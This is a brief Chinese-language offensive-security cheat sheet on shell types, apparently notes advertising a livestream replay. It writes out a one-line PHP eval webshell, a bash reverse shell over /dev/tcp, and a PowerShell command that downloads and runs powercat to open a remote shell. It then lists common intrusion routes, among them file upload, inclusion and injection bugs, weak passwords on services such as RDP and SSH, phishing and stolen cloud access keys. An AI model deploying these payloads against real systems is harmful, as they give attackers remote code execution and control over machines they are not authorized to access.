shell的常见类型
一、webshell
常见类型:php、java、asp、aspx
通常分为:大马和小马
常见管理工具:菜刀、哥斯拉、冰蝎、蚁剑
经典一句话: <?php @eval($_REQUEST[10086]);?>
二、反弹shell
基础反弹shell:
linux:
bash -i >& /dev/tcp/192.168.0.1/65535 0>&1
windows: powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd
三、升级可交互式反弹shell
WEB应用获取权限常见方式:
一、任意文件上传漏洞
二、web容器解析漏洞
三、文件包含漏洞
四、命令执行漏洞、代码执行漏洞
五、sql注入漏洞
六、未授权访问漏洞
七、框架、组件、CMS漏洞,其他组合拳...等等
数据库服务获取权限方式
获取权限方式:组合拳或者执行数据库内部函数
数据库类型:mssql、mysql、oracle、redis、postgresql、SQLite等等
常见协议获取权限方式
获取权限方式:CVE漏洞、弱口令、未授权访问等
常用服务:RDP、 SSH、 VNC、telnet、ftp、RMI、SMB、JDWP、 rsync等等
其他获取权限方式
钓鱼、 云服务器key:阿里accesskey、 运维远控工具漏洞等
详细内容点击直播回放